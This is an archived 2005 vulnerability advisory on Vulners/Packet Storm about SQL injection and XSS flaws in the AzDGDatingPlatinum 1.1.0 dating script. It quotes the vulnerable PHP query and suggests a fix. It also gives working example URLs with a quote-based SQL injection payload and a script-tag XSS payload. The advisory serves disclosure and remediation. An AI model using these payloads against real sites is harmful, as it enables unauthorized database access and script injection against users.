Lucene search
K

AzDGDatingPlatinum.txt

🗓️ 18 Apr 2005 00:00:00Reported by kreonType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

SQL Injection and XSS vulnerabilities found in AzDGDatingPlatinum version 1.1.0 modules.

Code
`  
  
ADZ Security Team  
===================  
Info  
  
Program: AzDGDatingPlatinum  
Version: tested 1.1.0  
Modules: view.php, members/index.php  
Bug type: SQL Injection, XSS  
Vendor site: http://www.azdg.com/  
Vendor Informed: Yes  
===================  
Bug Info  
  
SQL Injection:  
  
At module view.php I've found a logical error:  
  
// code  
if (isset($id) || $id != "" || is_numeric($id)) {  
$result =   
mysql_query("SELECT * FROM ".C_MYSQL_MEMBERS."  
WHERE id ='$id'ANDstatus = '7'");  
// code  
  
As you see, here is no check about some "bad" symbols like quote....  
Replace "||" to "&&" to fix it  
(gpc_magic_quotes must be Off to exploit this bug)  
  
Example:  
http://[host]/[path]/view.php?l=default&id=3'%20OR%20'a'='a'/*  
  
http://127.0.0.1/dating.lan/members/index.php?l=default&a=v&from=[SQL CODE] - Second "bad" module without $from checking  
  
XSS:  
  
Simple XSS-bugs, like so:  
  
http://[host]/[path]/view.php?l=default&id=3%3Cscript%3Ealert();%3C/script%3E  
  
  
===================  
Contact  
  
ADZ Security Team  
URL: http://adz.void.ru/  
IRC: #adz @ QuakeNet  
MAIL: [email protected], [email protected] (for non-russian users)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Apr 2005 00:00Current
7.4High risk
Vulners AI Score7.4
20